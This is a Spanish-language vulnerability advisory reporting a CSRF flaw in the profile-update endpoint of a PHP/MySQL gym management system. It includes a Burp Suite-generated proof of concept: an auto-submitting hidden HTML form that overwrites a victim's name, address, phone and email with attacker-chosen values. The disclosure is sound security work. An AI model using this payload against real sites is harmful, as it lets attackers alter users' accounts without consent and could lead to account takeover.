
Sistema de gestión de gimnasio con PHP y MYSQL
Un sistema de gestión de gimnasio construido con PHP y MySQL.
Shoaib Alam - Perfil de LinkedIn
Se ha identificado una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el Sistema de Gestión de Gimnasio. Este problema está presente en la funcionalidad de actualización de perfil del Panel de Usuario.
La aplicación actualmente carece de la implementación de tokens Anti-CSRF, lo que resulta en vulnerabilidad a ataques de Cross-Site Request Forgery (CSRF). Esta debilidad de seguridad afecta específicamente al endpoint /profile.php. Un atacante puede explotar esta falla para realizar modificaciones no autorizadas a información sensible del usuario, como dirección, nombre y número de teléfono. Esto podría comprometer la integridad de las cuentas de usuario y dar lugar a problemas de seguridad adicionales.
Endpoint vulnerable: /profile.php
A continuación se muestra una prueba de concepto que demuestra la vulnerabilidad CSRF. Este PoC fue generado usando Burp Suite Professional.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/gym/profile.php" method="POST">
<input type="hidden" name="fname" value="hacked" />
<input type="hidden" name="lname" value="victim" />
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="mobile" value="9999999999" />
<input type="hidden" name="state" value="hacked" />
<input type="hidden" name="city" value="hacked" />
<input type="hidden" name="address" value="hacked" />
<input type="hidden" name="submit" value="Update" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>